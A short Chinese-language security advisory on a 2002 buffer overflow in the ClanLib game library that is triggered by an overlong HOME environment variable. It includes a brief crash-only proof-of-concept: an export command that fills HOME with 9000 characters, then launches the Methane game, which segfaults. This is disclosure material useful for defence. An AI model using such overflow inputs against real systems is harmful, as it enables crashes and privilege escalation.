ClanLib环境变量缓冲溢出漏洞

发布时间：2002-01-19
更新时间：2002-01-19
严重程度：高
威胁程度：权限提升
错误类型：边界检查错误
利用方式：服务器模式

BUGTRAQ ID：3877

受影响系统

ClanLib ClanLib 5.0
   + Conectiva Linux 6.0
   + Conectiva Linux 7.0
   + MandrakeSoft Linux Mandrake 8.1

详细描述
ClanLib 是跨平台游戏开放库，包含多个通用低级相关图形，声音和资源管理函数。

其中在处理超长环境变量的时候存在漏洞，可以导致缓冲溢出并以用户或者'games'
身份执行任意代码。

测试代码
[root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc root]# /usr/games/methane
Super Methane Brothers
Licensed using the GNU General Public License Version 2
http://www.methane.fsnet.co.uk
...
This game requires ClanLib (v0.5.0) and Hermes (v1.3.3)
http://clanlib.org/hermes
(High Scores written to /var/lib/games/methanescores)
Segmentation fault

解决方案
尚无

相关信息
KF <dotslash@snosoft.com>
参考：http://www.securityfocus.com/archive/1/250414
相关主页：http://www.clanlib.org/

最近严重漏洞

ClanLib环境变量缓冲溢出漏洞